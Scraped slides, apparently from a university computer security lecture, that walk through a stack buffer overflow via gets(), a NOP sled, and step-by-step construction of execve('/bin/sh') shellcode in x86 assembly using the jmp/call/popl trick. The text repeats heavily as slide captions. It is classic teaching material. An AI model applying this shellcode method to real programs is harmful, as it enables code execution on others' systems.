![Running Evil Code… 36 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb](http://images.slideplayer.com/32/9987801/slides/slide_36.jpg "Running Evil Code… 36 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb")
37
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 37 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 37 Basic Idea Sample Attacks Protection , Computer & Network Security](http://images.slideplayer.com/32/9987801/slides/slide_37.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 37 Basic Idea Sample Attacks Protection , Computer & Network Security")
38
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 38 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 38 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880](http://images.slideplayer.com/32/9987801/slides/slide_38.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 38 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880")
39
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 39 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 39 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff](http://images.slideplayer.com/32/9987801/slides/slide_39.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 39 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff")
40
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 40 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 “/bin/sh”
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 40 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 /bin/sh](http://images.slideplayer.com/32/9987801/slides/slide_40.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 40 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 /bin/sh")
41
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 41 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 41 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc](http://images.slideplayer.com/32/9987801/slides/slide_41.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 41 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc")
42
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 42 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc name
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 42 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc name](http://images.slideplayer.com/32/9987801/slides/slide_42.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 42 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc name")
43
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 43 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0xfffffff8 0x80884a8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 43 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0xfffffff8 0x80884a8](http://images.slideplayer.com/32/9987801/slides/slide_43.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 43 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0xfffffff8 0x80884a8")
44
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 44 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0x80884a8 0xfffffff8 ret sfp fp (ebp)
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 44 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0x80884a8 0xfffffff8 ret sfp fp (ebp)](http://images.slideplayer.com/32/9987801/slides/slide_44.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 44 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0x80884a8 0xfffffff8 ret sfp fp (ebp)")
45
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 45 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx 0x80884a8 0xfffffff8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 45 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx 0x80884a8 0xfffffff8](http://images.slideplayer.com/32/9987801/slides/slide_45.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 45 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx 0x80884a8 0xfffffff8")
46
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 46 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx 0x80884a8 0xfffffff8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 46 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx 0x80884a8 0xfffffff8](http://images.slideplayer.com/32/9987801/slides/slide_46.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 46 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx 0x80884a8 0xfffffff8")
47
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 47 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 47 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8](http://images.slideplayer.com/32/9987801/slides/slide_47.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 47 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8")
48
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 48 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 48 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8](http://images.slideplayer.com/32/9987801/slides/slide_48.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 48 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8")
49
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 49 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8
![void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 49 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8](http://images.slideplayer.com/32/9987801/slides/slide_49.jpg "void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = /bin/sh ; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 49 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8")
50
Running Evil Code… 50 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80
51
Running Evil Code… 51 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ecx ebx edx 0x8
52
Running Evil Code… 52 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ??????
53
Running Evil Code… 53 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string
54
Running Evil Code… 54 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
55
Running Evil Code… 55 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
56
Running Evil Code… 56 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh”
57
Running Evil Code… 57 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh” esi
58
